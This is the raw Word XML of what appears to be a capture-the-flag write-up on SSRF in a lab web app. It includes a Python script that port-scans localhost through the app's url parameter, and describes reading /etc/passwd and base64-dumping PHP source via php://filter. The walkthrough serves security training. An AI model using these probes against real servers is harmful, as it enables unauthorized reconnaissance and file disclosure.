          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigating to this directory, we see several outputs with multiple logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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5295900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="529590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1D">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Now I will open our log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output-286568799.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we have the source code of the home page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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4495800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="449580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20">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From here, we can create a simple Python port scanner to discover which services are running internally, since we have SSRF =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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5130800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="513080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23">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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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lines = []</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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with open('ports.txt') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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lines = f.readlines()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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for line in lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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port = line.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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url = "http://172.31.30.227/api.php"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">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payload = {"url": f"http://127.0.0.1:{port}"}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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r = requests.post(url=url, data=payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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r_length = len(r.content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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if r_length &gt; 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">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print(f"Port --&gt; {port}")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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running the port scan, it returns an interesting port: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will go back to Burp and send a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">request to this port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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3175000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="317500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Opening the generated log file again, we find our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and now we have a new endpoint → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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3530600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71" name="image23.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image23.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="353060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will repeat the same process for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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768600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="276860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3835400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="383540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receive a message saying that the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was not found. So we will send the request again, this time passing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter to read a file from the internal server. In this case, I will read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">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819400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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4533900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="453390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And we are able to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The next step will be to read the contents of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to understand what it is doing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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will use different schemes, which are also viable in SSRF, such as: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://, file://, php://, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">etc.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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Since this is a PHP file, I will use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter/convert.base64-encode/resource= </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to Base64-encode the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file so that we can view its source code after decoding it. Otherwise, the back-end would interpret the PHP code and return a blank page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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3124200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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870200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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now have the Base64-encoded content of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let’s decode it and see what is happening “behind the scenes.”</w:t>
      </w:r>
    </w:p>
